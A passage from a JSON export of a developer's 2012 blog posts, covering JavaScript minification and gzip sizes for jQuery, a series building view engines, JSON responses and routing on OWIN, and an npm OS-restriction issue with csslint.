application.\nSo if you’ve got a Pinboard account (and if you don’t you should switch to using it!) grab my application and get bookmarking :D.\n", "id": "2012-06-01-pinboard-for-win8" }, { "title": "Understanding compression and minification", "url": "https://www.aaron-powell.com/posts/2012-05-29-understanding-compression-and-minification/", "date": "Tue, 29 May 2012 00:00:00 +0000", "tags": [ "javascript" ], "description": "An look into what is involved in JavaScript compression and minification as well as where the benefits lie.", "content": "One of my colleagues raised a question on our internal discussion system as to why we should use minified JavaScript libraries. Now I’m sure everyone knows that you should minimize your libraries but do you really understand what the different levels of minification are and the benefits of the different levels? While I strongly recommend that you should ensure that on a production system you always have your JavaScript minified and gzipped (well and the right caching headers but that’s beyond the scope of this blog post) let’s have a look as to exactly what differences it makes.\nFor the exercise I decided that I would take the jQuery 1.7.2 release as it’s a very common JavaScript library and it’s very well written and formatted. I’m going to use the unminified version to run the steps against. For the minification I’ve decided to use uglify js which is toting itself as the best library for minification, it’s also got a pretty nice API so I can work with it programmatically. Lastly I’ve got a tiny Node.js application running Express.js that is serving out the files.\nServing the raw fileLet’s start by looking at serving a completely raw file, the jQuery development release and if we request our file we’ll see something like this as the response headers:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript Content-Length: 327171 Connection: keep-alive So the raw request is coming back at 327171 bytes which is pretty large. From a production point of view you wouldn’t exactly want to do this everytime. Let’s turn on gzip for this same request and see what happens:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 78390 Content-Type: application/javascript Connection: keep-alive Now that I’ve turned on gzip compression our request is already down to 78390 bytes, this is a pretty drastic reduction already and all we’ve done is turn on compression. But we’re not really getting the most our of our response, gzipping is good, it takes care of common parts of our code, the function keyword, whitespace, etc, but there’s still more we can get out of this.\nStripping commentsComments are useful in your codebase but do you really need to send them down to the user? Probably not. So let’s strip them out before sending our response and see what impact this has. For this I’m going to use uglify.js and rebuilt the AST from our original source. I’m going to maintain the structure of our code so we’re going to have a bunch of whitespace still, it wont be exactly what jQuery originally had since we’ve had to rebuild the codebase from the AST but at least our code would still be useful if we want to step through. If we take a look at the first few lines of the file it looks like this:\n(function(window, undefined) { var document = window.document, navigator = window.navigator, location = window.location; var jQuery = function() { var jQuery = function(selector, context) { return new jQuery.fn.init(selector, context, rootjQuery); }, _jQuery = window.jQuery, _$ = window.$, rootjQuery, quickExpr = /^(?:[^#<]*(<[\\w\\W]+>)[^>]*$|#([\\w\\-]*)$)/, rnotwhite = /\\S/, trimLeft = /^\\s+/, trimRight = /\\s+$/, rsingleTag = /^<(\\w+)\\s*\\/?>(?:<\\/\\1>)?$/, rvalidchars = /^[\\],:{}\\s]*$/, rvalidescape = /\\\\(?:["\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g, rvalidtokens = /"[^"\\\\\\n\\r]*"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g, rvalidbraces = /(?:^|:|,)(?:\\s*\\[)+/g, rwebkit = /(webkit)[ \\/]([\\w.]+)/, ropera = /(opera)(?:.*version)?[ \\/]([\\w.]+)/, rmsie = /(msie) ([\\w.]+)/, rmozilla = /(mozilla)(?:.*? rv:([\\w.]+))?/, rdashAlpha = /-([a-z]|[0-9])/ig, rmsPrefix = /^-ms-/, fcamelCase = function(all, letter) { return (letter + "").toUpperCase(); }, userAgent = navigator.userAgent, browserMatch, readyList, DOMContentLoaded, toString = Object.prototype.toString, hasOwn = Object.prototype.hasOwnProperty, push = Array.prototype.push, slice = Array.prototype.slice, trim = String.prototype.trim, indexOf = Array.prototype.indexOf, class2type = {}; jQuery.fn = jQuery.prototype = { constructor: jQuery, As I said this isn’t exactly what the jQuery source looked like since we’ve removed more whitespace but it’s close and most importantly it’s readable.\nNow let’s look at the headers:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 254399 Connection: keep-alive If we compare that to the original we’ve gone down to 254399 bytes. Cool even with that we’ve dropped a good bit of weight from our response. Now let’s also gzip it:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 48566 Content-Type: application/javascript Connection: keep-alive Again we’re getting some better performance because we don’t have the comments which don’t compress as well as say whitespace and a slightly more organised codebase.\nMangling our codeOne of the most common things that a minifier will do is obfuscate your code, variables, functions, etc will all be renamed into smaller versions so that you have smaller files by having smaller names. Obviously this makes your code a whole lot harder to read (hence obfuscation) but it does do wonders for file size. Again we’re going to get uglify.js to help us out so let’s have a look at the first few lines again:\n(function(a, b) { function h(a) { var b = g[a] = {}, c, d; a = a.split(/\\s+/); for (c = 0, d = a.length; c < d; c++) { b[a[c]] = true; } return b; } Well that’s quite different now isn’t it! You’ll see from the very first line in the original version we had two arguments window and undefined, these are now called a and b, the body has also been rewritten so that there’s a different order for the code, functions are now at the top, the first being a function called h. Here’s the original function that is now the h function:\nfunction createFlags(flags) { var object = flagsCache[flags] = {}, i, length; flags = flags.split(/\\s+/); for (i = 0, length = flags.length; i < length; i++) { object[flags[i]] = true; } return object; } As you can see the use of smaller variable names and this is done because the variables are never needed by any consumer of the API, so renaming object to b wont be a problem because anyone who knew it was object has also had their references updated. So what’s the impact on size?\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 213222 Connection: keep-alive If we compare this back to the last request you’ll see that it’s only slightly smaller, but this is the advantage of using minimal variable names (and keep in mind we still have whitespace). And now we’ll try gzipping it:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 42854 Content-Type: application/javascript Connection: keep-alive Again we’re not really that might smaller than just the comment stripped version but we are shrinking our response down.\nOptimising the codebaseAlthough variable minification can do good things to getting your files smaller you can get even more out of it if you’re smart about your codebase, in this stage we’re looking at tricks of the JavaScript language that you won’t want to actually write but are useful when you’re trying to get smaller files. Things like utilising the comma operator can be useful for chaining together statements and removing unreachable code are something best left to the machines, you can easily introduce errors into your JavaScript if you’re not careful. Let’s run this over our codebase:\n(function(a, b) { function h(a) { var b = g[a] = {}, c, d; a = a.split(/\\s+/); for (c = 0, d = a.length; c < d; c++) b[a[c]] = !0; return b; } Well now that is looking rather different isn’t it. You’ll see that there’s some interesting tricks that have been applied, in particular the use of !0. Fascinating how you can exploit JavaScript boolean operations isn’t it. If you’re unsure of what this is doing in JavaScript 0 is a falsey value, meaning that JavaScript will treat 0 as false, but it’s not actually false (0 === false returns false) but by putting a ! operator it will force the value to be converted to an actual boolean by returning the inverse, and !0 === true. Like I said, fascinating.\nSo what’s it do for our response size (keep in mind we still have whitespace maintained):\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 155600 Connection: keep-alive Well that’s looking good, we’ve really dropped the size nicely, and if we gzip it:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 39185 Content-Type: application/javascript Connection: keep-alive Almost there! It’s getting pretty small right there ey!\nPutting it all togetherWe’ve pretty much run through all of the different steps to get our responses down, we’ve seen the impact of each step, but let’s roll it all together and also strip off the whitespace:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 94656 Connection: keep-alive So if we drop the whitespace we are drastically reducing the size of our library but our code is next to impossible to step into if we need to debug it. This is a logical desire of a production system, you really shouldn’t be debugging through it. So what if we turn on gzipping this time, we’ve already removed the whitespace, the biggest space waste in our response so can we really get as much from gzipping?\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 33632 Content-Type: application/javascript Connection: keep-alive Sweet, we’ve still got a really good levels of compression against our library, down to just 33632 bytes for jQuery.\nSize MattersNow that we’ve seen how we get to the end goal, an ultra-small version of our JavaScript library we should answer the question of why. The simplest answer to the question is speed, by having a smaller file (~30kb vs ~350kb) we can send that down from the server a lot quicker. This is especially important when you’re looking at this from a mobile point of view, you’ve got a limited bandwidth allowance so you want to be able to send as much as quickly as possible.\nBut what about from the point of view of high-speed network connections, is file size really that important if you’re transmitting over ADSL2 or something? Well yes it still does matter, even if you can download the file fast you can download smaller files even faster and that will have an impact on the overall speed of your application, the faster all dependencies are loaded the faster your application becomes response to the end user.\nThe other main reason to ensure that you’re files are as small as possible is caching. Again this is most important from a mobile browser point of view but it’s still very valid with desktop browsers. Mobile browsers have fairly limited cache allowances. Yahoo! did a blog post which they looked at the allowances for the different mobile devices (although it’s a bit out-of-date) and you can see from that you’ve not got a lot of play so the better packed your files the safer you’ll be in cache. Desktop browsers are a lot more flexible since you can change their cache allowances and they also have higher starting levels.\nConclusionSo you’ve seen throughout this blog exactly what makes up minification of JavaScript libraries, what different minification concepts bring to the table and ultimately just why you should minify and gzip your libraries in production. Keep in mind that there’s more to performance that I haven’t covered such as caching but there’s plenty of articles out there that can help you with that ;).\n", "id": "2012-05-29-understanding-compression-and-minification" }, { "title": "OWIN series conclusion", "url": "https://www.aaron-powell.com/posts/2012-04-10-owin-conclusion/", "date": "Tue, 10 Apr 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "Wrapping up the OWIN series", "content": "Over the last few weeks I’ve done a small series of blog posts looking at the Open Web Interface for .NET, aka OWIN.\nThe series was made up of:\nA Hello World introduction Introducing middleware Routing Responses View Engines in both simple and advanced forms A github repository with all the code I started look at OWIN after bitching at Damian Edwards over the poor documentation and he told me to stop bitching and work it out. So I did and while doing it I though I’d do my best to contribute back so that others have a better starting point.\nMajor take away points I had a lot of fun playing with OWIN but most importantly I think I’ve learnt a thing or two and here are my major take away points from the last few weeks:\nLearn your web stack. This is something that I found really important; while WebForms is a very high level abstraction on the web MVC has really changed that, it’s quite close to the wire. But even then it’s sometimes not close enough. I’ve worked on projects where we’ve had to work around the gates put up by MVC to protect developers from doing something really stupid so sometimes you want something else. I can see where OWIN would fit in there, especially if you combine it with something like Nancyfx you can still get all the ASP.Net powers but also skip around it when required.\nMiddleware is your friend. Sure I’d done it before when it comes to middleware but I’ve always been interested as to how you’d approach it in .NET. JavaScript is a very nice language especially when it comes to functional-esq programming so being able to try a similar idea in .NET and compare the experience was interesting. Generics and delegates can be a bitch in .NET, but it’s generally a problem you wont have to face.\nYou don’t need everything up front. While it may seems very convenient that I had a series of blogs that expanded on the ideas of the ones before it that was initially an accident. I started with the intention of just doing the first post but as I wrote the code our I could see it evolving. I didn’t even think about a View Engine until I’d already exhausted the routes and response sections, both of which somewhat relied upon an understanding of middleware. You can easily cut out sections of the series of you don’t need an application that has a View Engine (say a RESTful service). Modularity is power, it’s something that the Node.js and Ruby guys have known for a long time but projects like OWIN as making it more accessible in .NET.\nWrapping up Hopefully you’ve enjoyed the journey too and learnt a thing or two along the way. This series has been by no means an extensive dive into all parts OWIN, I’ll freely admit there’s things I ignored as I didn’t think them interesting enough (like how do you serve out statics like CSS and JavaScript?) and there’s other things that I didn’t even work out (like how Firefly works!). My goal was to give anyone who wants to play with OWIN a starting location and I think I’ve done that.\n", "id": "2012-04-10-owin-conclusion" }, { "title": "OWIN and View Engines, Part 2", "url": "https://www.aaron-powell.com/posts/2012-04-02-owin-view-engines-part-2/", "date": "Mon, 02 Apr 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "Taking the View Engine concept one step further", "content": "In the last post we had a bit of a look at View Engines for OWIN and in this one I want to take the idea just a little bit further.\nMost web frameworks you come across will allow you to choose your own View Engine. ASP.Net MVC allows for this (although it can be tricky) and frameworks like Express.js or Nancy make it quite easy to drop in your own one.\nYou may be wondering why you would want to do this? Apart from the “because you can” and “freedom of choice” reasons there is a slightly more valid reason. Most view engines while being generic often have a level of speciality to them; the developers who write it don’t know about every scenario you’d want to use it in. Let’s say you’re a Node.js programmer who has a love for CoffeeScript. You might want to use the CoffeeKup View Engine since it allows you to write in you native language (I don’t want to debate the merits of this it’s a valid scenario) but the problem with CoffeeKup is it can’t do XML (at least the last time I used it it couldn’t). This may not be really that big a deal for the majority of your application but what if you’ve got an RSS feed? Well then you can’t really expose that through your chosen View Engine so you’d want for that specific route to be able to change to a different View Engine.\nTeasing out our View EngineThe first step to making our View Engine more extensible is I’m going to pull out an interface from the RazorViewEngine we have:\npublic interface IViewEngine { string Parse(string viewName); string Parse<T>(string viewName, T model); } Now I would just have to implement that interface to create a View Engine and not take a dependency on Razor at all.\nYou obviously want to update the other references to RazorViewEngine to just be the interface, such as on our singleton and generic argument constraints. Now everywhere we’ll just deal with the interface and never the concrete class.\nEnabling multiple View EnginesEssentially what we’re doing there is enabling multiple View Engines and I’m going to do this via two methods on my ViewEngineActivator called RegisterViewEngine and ResolveViewEngine:\npublic static void RegisterViewEngine(string viewEngineId, Func<IViewEngine> viewEngineActivator) { throw new NotImplementedException(); } public static IViewEngine ResolveViewEngine(string viewEngineId) { throw new NotImplementedException(); } I’m choosing to do a lazy invocation of the View Engine, meaning that you provide a function to create it rather than a created instance. The reason I’ve done this is just so we don’t create it until we do actually require it. But because I only want to create it once anyway I’m going to store the created View Engine once the function executes. For storage I’m going to maintain a private variable like so:\nprivate static Dictionary<string, Tuple<Func<IViewEngine>, IViewEngine>> viewEngines = new Dictionary<string, Tuple<Func<IViewEngine>, IViewEngine>>(); And now we’ll update our registration method:\npublic static void RegisterViewEngine(string viewEngineId, Func<IViewEngine> viewEngineActivator) { viewEngines.Add(viewEngineId, new Tuple<Func<IViewEngine>, IViewEngine>(viewEngineActivator, (IViewEngine)null)); } As I said I’m staging the instance until it’s needed so inside the tuple I’m just storing a null value. You’ll also have noticed that I’m passing in an ID for the View Engine, this is so we can easily find it later on.\nNow we’ll go ahead and implement our resolution method:\npublic static IViewEngine ResolveViewEngine(string viewEngineId) { if (string.IsNullOrEmpty(viewEngineId)) { throw new ArgumentNullException("viewEngineId", "A ViewEngine ID needs to be provided for resolution"); } if (!viewEngines.ContainsKey(viewEngineId)) { throw new KeyNotFoundException(string.Format("The ViewEngine ID {0} has not been registered, ensure it is registered before use", viewEngineId)); } var engine = viewEngines[viewEngineId]; if (engine.Item2 == null) { var activator = engine.Item1; engine = viewEngines[viewEngineId] = new Tuple<Func<IViewEngine>, IViewEngine>(activator, engine.Item1()); } return engine.Item2; } What we’re doing here is:\nEnsuring that we are being provided an ID for the View Engine and that it does exist in the store Pulling out the tuple If we haven’t created the View Engine yet (stored in Item2) we’ll create it Return the View Engine Now I need to make a way to register each View Engine. You can do this by accessing the ViewEngineActivator itself but that’s not quite as fluent when you’re working with the IAppBuilder so we’ll chuck an extension method on there:\npublic static IAppBuilder RegisterViewEngine(this IAppBuilder builder, Func<IViewEngine> viewEngine, string viewEngineId) { ViewEngineActivator.RegisterViewEngine(viewEngineId, viewEngine); return builder; } Noting really special with this other than making our API read nicely:\nbuilder .DefaultViewEngine<RazorViewEngine>() .RegisterViewEngine(() => new XmlViewEngine(), "xml") // and so on Accessing the right View EngineSo we’ve seen how to get a View Engine by an ID but we want to make it easier. Generally speaking you’re going to be only using a single View Engine for most of your routes. To this end I want to have a default View Engine which will be loaded up, which is what our singleton was doing for us before; I’m going to rename it to DefaultViewEngine to make it more discoverable and change it from being a standard get/ set to look like this:\npublic static IViewEngine DefaultViewEngine { get { if (defaultViewEngine == null) defaultViewEngine = ResolveViewEngine("defaultViewEngine"); return defaultViewEngine; } set { defaultViewEngine = value; } } Now I’ve got a backing field and I’m also going to be working under the assumption that there’s a View Engine called defaultViewEngine. This means that you can set it as before or alternatively set it through lazy loading (which the if condition will take care of).\nUsing an alternate View EngineWe’ve made it to allow you to specify a default View Engine, specify alternate View Engines so let’s look at how to use them.\nThere’s two ways you could go about this, you could either add a new parameter to the route registration which is the View Engine to use or you can put it on the actual call to the View Engine. Personally I like approach two more as the View Engine isn’t really related to the route but to the route handler and it also means that as I want to do some overloads for the route methods its not going to mean a lot of duplicate code (which is the same reason that we went with the View extension method to begin with if you remember).\nThis gives us an extension method like this:\npublic static void View(this Response res, string view, string viewEngineId) { var viewEngine = ViewEngineActivator.ResolveViewEngine(viewEngineId); var output = viewEngine.Parse(view); res.ContentType = "text/html"; res.Status = "200 OK"; res.End(output); } (And I’ll leave the model-based one to your imagination)\nIt’s pretty simple as you can see, mostly just a set of pass through method calls and it means our handler could be like:\n.View("/foo", (req, res) => { res.View("fooEngine"); }) While it’s true I’m hard-coding text/html as the content type that’s something you can change yourself, or even make it so that the View Engine knows more about the content type that is being returned; I’ll leave those as your exercises.\nConclusionThis wrap up our look at View Engines; we’ve seen how to create something simple to support a single View Engine and then expanded on the concept to enable us to use a different View Engine if and when required.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-04-02-owin-view-engines-part-2" }, { "title": "OWIN and View Engines", "url": "https://www.aaron-powell.com/posts/2012-03-23-owin-view-engines/", "date": "Fri, 23 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "A look at how you'd put together a View Engine for OWIN.", "content": "In the last post we looked at improving our responses in OWIN by adding some extensions methods to the response object and the next logical step for this is to think about HTML. While what we’ve brought together thus far is useful if you’re creating something that is just a web API if you want to create an actual web site you probably need to respond with some HTML.\nTo this end we’re going to need to think about creating a View Engine that will be responsible for our HTML generation. The reason I want to go down this path is it makes it nicer if we want to add some level of dynamic data to the HTML we’re serving, say insert a user name or other things like that.\nPicking our languageHTML isn’t a language that has dynamic features to it so we need to look at a templating language to leverage for this. If you look around there’s plenty of different HTML templating languages like HAML, Spark, Jade or even Razor.\nSince I want to make it something easy to understand for the .NET developer I’m going to use Razor as my templating language, and I’m going to use the RazorEngine project to help me out (it saves me writing all the bootstrapping code).\nApproaching the View EngineSo we’re going to use Razor but how are we going to use it? We need some way to “create” our View Engine and then we will want to interact with it.\nSince the View Engine could be a little bit complex I’m going to create a class which will represent the engine. This will also mean that I can do some caching within the View Engine to ensure optimal performance.\nWith that in mind how are we going to interact with the View Engine? We obviously don’t want to spin it up every single time, instead I want it to always be available. So this means that I’m going to have a static that lives somewhere which I’ll want to interact with.\nFinally how will we get that View Engine instance? Do we have it magically created or do we want it lazy-loaded?\nThese are all things to be considered but my approach is going to be:\nUse a singleton for the View Engine Have a ViewEngineActivator which we access it through The user must explicitly register the ViewEngine they want to use in code Coding the View Engine Thinking about the View Engine there’s not a lot that the class would have to publicly expose, in fact I really think you only want two methods, one that takes a view name, one which takes a view name and a model.\nSo the View Engine will look something like this:\npublic class RazorViewEngine { public string Parse(string viewName) { return Parse<object>(viewName, null); } public string Parse<T>(string viewName, T model) { throw new NotImplementedException(); } } Cool that’s not very complex, let’s start on the activator:\npublic static class ViewEngineActivator { public static RazorViewEngine ViewEngine { get; set; } } And now we’ll make it possible to register a View Engine:\npublic static IAppBuilder UseViewEngine<TViewEngine>(this IAppBuilder builder) where TViewEngine: RazorViewEngine, new() { ViewEngineActivator.ViewEngine = new TViewEngine(); } /* snip */ builder.UseViewEngine<RazorViewEngine>(); Now that the infrastructure code is all there we need to think about how we would go about reading in the views and turning them into something we can send down as a response. In our View Engine we’re going to need to know where to find the views. I like conventions so I’m going to expect them to be in the views folder at the application root. But I’m a nice guy so I think it should be possible to put the views into another folder if you desire so I’ll add some constructors like so:\npublic RazorViewEngine() : this("views", "_layout") { } public RazorViewEngine(string viewFolder, string layoutViewName) { ViewFolder = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, viewFolder); LayoutViewName = layoutViewName; if (!Directory.Exists(ViewFolder)) throw new DirectoryNotFoundException("The view folder specified cannot be located.\\r\\nThe folder should be in the root of your application which was resolved as " + AppDomain.CurrentDomain.BaseDirectory); } I’m also going to check to make sure that the views folder does exist. I’m also wanting support a “layout” view so that you can do reusable HTML; it just makes sense.\nSince you’re now able to specify the Views folder I’ll add another extension method so you can provide that instead of using the default way:\npublic static IAppBuilder UseViewEngine<TViewEngine>(this IAppBuilder builder, TViewEngine viewEngine) where TViewEngine: RazorViewEngine { ViewEngineActivator.ViewEngine = viewEngine; } This also means that you could super-class the RazorViewEngine if you want and provide additional functionality.\nNext up we’ll start implementing our Parse<T> method.\npublic string Parse<T>(string viewName, T model) { viewName = viewName.ToLower(); if (!viewCache.ContainsKey(viewName)) { var layout = FindView(LayoutViewName); var view = FindView(viewName); if (!view.Exists) throw new FileNotFoundException("No view with the name '" + view + "' was found in the views folder (" + ViewFolder + ").\\r\\nEnsure that you have a file with that name and an extension of either cshtml or vbhtml"); var content = File.ReadAllText(view.FullName); if (layout.Exists) content = File.ReadAllText(layout.FullName).Replace("@Body", content); viewCache[viewName] = content; } return Razor.Parse(viewCache[viewName], model); } What you’ll see here is I’m creating a cache of views that get discovered for performance so it’s all shoved into a static dictionary that I’ve got*. Assuming that this is the first time we’ll look for the layout view and current view, raise an error if the view isn’t found, and then combine them all together.\n*This is pretty hacky code and doesn’t take concurrency into account; make sure you do double-lock checking!\nOne convention I’m adding myself is that the “body” (aka, the current view) will be rendered where ever you place an @Body directive. This is because we’re using Razor the language which is slightly different to MVC’s Razor. The language doesn’t include the RenderBody method, that’s specific for the implementation. When creating your own view engine though you’re at liberty to do this how ever you want. You could alternatively create your own base class that handles the body better, me, I’m lazy and want a quick demo.\nI finish off caching the generated template so that next time we can skip a bunch of the lookup steps and then get RazorEngine to parse the template and send back the HTML*.\n*I’m not sure if this is the best way to do it with RazorEngine, I think you can do it better for caching but meh. Also, you don’t have to return HTML, you could use this engine to output any angled-bracket content.\nUsing our View EngineNow that we have our View Engine written we need to work out how we’ll actually use it. Like we did in the last post I’m going to use extension methods on the Response object to provide the functionality:\npublic static void View(this Response res, string view) { var output = ViewEngineActivator.ViewEngine.Parse(view); res.ContentType = "text/html"; res.Status = "200 OK"; res.End(output); } public static void View<T>(this Response res, string view, T model) { var output = ViewEngineActivator.ViewEngine.Parse(view, model); res.ContentType = "text/html"; res.Status = "200 OK"; res.End(output); } This is pretty simple, we’re really just acting as a bridge between the response and the view engine. Sure I’m also making the assumption that it’s text/html that we’re returning despite saying above we can do any angled-bracket response, changing that can be your exercise dear reader.\nBringing it all togetherSo we’ve got everything written let’s start using it:\nbuilder .UseViewEngine<RazorViewEngine>() .Get("/razor/basic", (req, res) => { res.View("Basic"); }); Pretty simple to use our View Engine now isn’t it!\nConclusionIn this post we’ve had a look at what it’d take to produce a basic View Engine on top of OWIN, building on top of the knowledge and concepts of the last few posts.\nIn the next post I’m going to take the idea of a View Engine one step further and give the user a lot more power.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-03-23-owin-view-engines" }, { "title": "Watch your OS", "url": "https://www.aaron-powell.com/posts/2012-03-21-watch-your-os/", "date": "Wed, 21 Mar 2012 00:00:00 +0000", "tags": [ "nodejs", "npm" ], "description": "Today we got caught out by a recent npm change", "content": "Today some of my colleagues were trying to integrate csslint into the build process of a project using the nodejs package but they kept hitting an issue:\nnpm ERR! Unsupported npm ERR! Not compatible with your operating system or architecture: csslint@0.9.7 npm ERR! Valid OS: darwin,linux npm ERR! Valid Arch: any npm ERR! Actual OS: win32 npm ERR! Actual Arch: ia32 So I had a crack on my machine and it worked just fine. This was rather confusing until we compared versions. I was running version 0.6.11 where as they were running 0.6.13. This didn’t make sense, why could I install it but they couldn’t?\nI put on my detective hat and went hunting, the first thing I found was that there is an OS restriction in the package.json file:\n"os": ["darwin", "linux"], This doesn’t include windows anywhere, but it also doesn’t explain why it worked on my Win7 x64 install but not theirs.\nThen I went back and checked out what changed between the two versions of Node.js, in particular what changed with npm.\nThat’s when I came across the release notes for 0.7.6. While true this is for the 0.7.* unstable branch and we’re using the 0.6.* stable what’s worth noting is the first change for npm version 1.1.8:\nAdd support for os/cpu fields in package.json (Adam Blackburn)\nI then looked at the 0.6.13 release, it’s using npm 1.1.9. Compare that to 0.6.11 which used npm 1.1.1 and I think we’ve found our issue. In the change between the two Node versions we’ve got a new npm version which supports something that wasn’t supported before!\nA simple fork and pull request and the problem is solved and now we have to wait for the next version for csslint to be published.\nLesson Learntnpm now supports the OS (and CPU) package.json property from CommonJS so make sure you check that properly!\n", "id": "2012-03-21-watch-your-os" }, { "title": "OWIN Responses", "url": "https://www.aaron-powell.com/posts/2012-03-19-owin-responses/", "date": "Mon, 19 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "A look at how to give power to our responses by making different response types easier to handle", "content": "In the last post we looked at Routing in OWIN as we built up a simple little route engine. Today I want to look at how to bring power to our responses by making it easier to respond with different types.\nIn ASP.Net MVC you’re probabily use to write code like this:\npublic ActionResult Index() { return Json(new { FirstName = "Aaron", LastName = "Powell" }); } Here our Action (which comes from our Route) is defining that we want to output JSON to the response and it gives us a nice way which we can do it. Let’s see about adding something similar to our application.\nResponding with JSONWe’ll start with an easy task, we’ll make it easier to respond with JSON. To do this there’s two things which we need to do:\nEnsure the appropriate content type is set on the response Put a value into the response that is valid JSON With those two requirements in mind we need to think about is just how we want the API to work, do we want an extension method on the IAppBuilder interface? If so how do we handle different request types, are we going to have a lot of boilerplate code to cover all that? Or maybe we should go with the Nancy approach and have a return value from our delegate. At the moment our delegate just executes some code; well maybe we could have it return instead. This would be advantageous as it would be somewhat familiar to MVC developers.\nBut neither of these options are really ideal in my opinion as they require a lot of code to make them work. We’d be constantly writing extension methods to handle this and when we get to another type (say XML) we’d either have to create yet another extension method or ensure we have a viable base type that we can return (which is what ActionResult does for MVC). Admittedly this is may be a symptom of our design thus far, but keep in mind that this is more about exploring the various concepts without adding huge amounts of overhead.\nSo this leaves us with one final option, augment the Response object to have these methods on it. This is the approach I want to go with as it feels cleaner (and it’s more familiar to me coming from Express.js). Rather than super-classing the Response object which we already have (like we did with the Request object) I’m going to stick with good ol’ fashioned extension methods. This makes it much easier to include the methods and also avoids having to change our delegate signatures (like we did when we introduced RoutedRequest) so we’ll spin up a new class:\npublic static class RouteExtensions { public static void Json(this Response res, dynamic obj, bool useJavaScriptNaming = true) { throw new NotImplementedException(); } } This is the basis for our extension method, I’m taking in two arguments, one of which is optional. The main argument, obj will represent the value which we want to serialize and send down to the client. I’m also having an optional boolean argument (defaulted to true) which will indicate whether we want to use JavaScript naming conventions (more on that in a second).\nFor the serialization we’re going to be using the JSON.Net serializer as it really is awesome.\nThe first things we want to do in our extension method are setting the content type and status code (since we can assume here that it’ll be successful by this being called; you could pass in the status code if you wanted but for simplicities sake we’ll hard code it):\npublic static void Json(this Response res, dynamic obj, bool useJavaScriptNaming = true) { res.ContentType = "application/json"; res.Status = "200 OK"; throw new NotImplementedException(); } Lovely, now to think about serialization. As I said I’m going to use JSON.Net and the reason I’m having the optional boolean argument is because .NET naming conventions are different to JavaScript (.NET uses PascalCase where as JavaScript is all about camelCase) so I want to force the conversion myself but allow people to opt-out of it if they want (which is something we’ve needed on the project I’m on at the moment). Luckily JSON.Net allows us to do this very easily:\npublic static void Json(this Response res, dynamic obj, bool useJavaScriptNaming = true) { res.ContentType = "application/json"; res.Status = "200 OK"; var serializer = new JsonSerializer(); if (useJavaScriptNaming) serializer.ContractResolver = new CamelCasePropertyNamesContractResolver(); res.End(JObject.FromObject(obj, serializer).ToString()); } See, quite easy. We start by creating a serializer, check the boolean argument and add a contract resolver of CamelCasePropertyNamesContractResolver if we want to do JavaScript naming and finish off by ending the response with a serialized object.\nThere may be an easier way to do this, I’m hardly a JSON.Net expert this is just the way I’ve come across doing it and it works fine for my needs.\nSending out JSONOnce importing the namespace for our extension methods we can get cracking on using it:\nbuilder.Get("/json", (req, res) => { res.Json(new { FirstName = "Aaron", LastName = "Powell" }); }); Yeah it’s just that simple! And since this is all within the scope of the request you can access any of the properties you have on your request (such as your named arguments) and work them into the response:\nbuilder.Get("/json/:name", (req, res) => { res.Json(new { Name = req.UrlSegments.name }); }); ConclusionSo this wraps up a quick look at how we can start enriching our responses by adding different response types. Using the method described above you could easily create methods to return text, XML, or even a VCard, basically anything you want from your application.\nIt’s all starting to come together nicely but there’s something quite important missing… HTML. In our next instalment we’ll look at producing a View Engine to respond with HTML.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-03-19-owin-responses" }, { "title": "OWIN routing", "url": "https://www.aaron-powell.com/posts/2012-03-16-owin-routing/", "date": "Fri, 16 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "Now it's time to do some routing on top of OWIN", "content": "Last time around we started looking at middleware in OWIN and how to handle different request types. So now comes the next logical step, how do we handle different URLs? Currently we don’t have the facilities to handle different URLs, aka routing, so let’s work on that.\nUnderstanding routing Before we dive into coding our solution it’s a good idea to think about what routing really is. You’re probably familiar with this from ASP.Net MVC with code such as:\nroutes.MapRoute( "Default", // Route name "{controller}/{action}/{id}", // URL with parameters new { controller = "Home", action = "Index", id = "" } // Parameter defaults ); What’s really important is line three, where we are defining what the URL we are going to be targeting looks like. With MVC routing we do a few other things such naming the route and providing default values for the segments of the URL that we’re trying to match but that’s not really of interest to us. If we think about the kinds of URLs we’re going to constructing we can break it down as:\nThere’ll probably something static in the URL Retrieve records we’ll probably have some kind of pattern to match Some URL segments may be useful in the handler Ok we understand a bit of how we want to construct our route matching let’s set about implementing it. To do this we’re going to build on top of the extension methods we built last time, but for this we’re going to need to be passing in a URL, well a pattern to match the URLs.\nDefining our route matchingThe first thing we’ll do is look at the routes systems in other middleware projects like Nancy, Express.js on Node and Sinatra on Ruby. Something that we can see from these three projects (and other middleware projects out there) is that they support the URL matching scenarios I described above (coincidence?) and they do it is similar ways. All allow you to do:\nA static value A named value This is slightly different in Nancy to the other two, Nancy uses {name} to define a named value where as the others use :name A pattern-matched value For this example I’m going to use the Sinatra/ Express.js routing style (:name not {name}).\nBreaking down our route matching So now that we know what we want to be able do in our URLs let’s think about how we’d do it.\nStatic values should be pretty easy, it’s just a string that we want to match against and equality statements should be right to take care of that, let’s move on.\nNamed values is next on the list, what we want to do here is take this particular URL segment and then grab 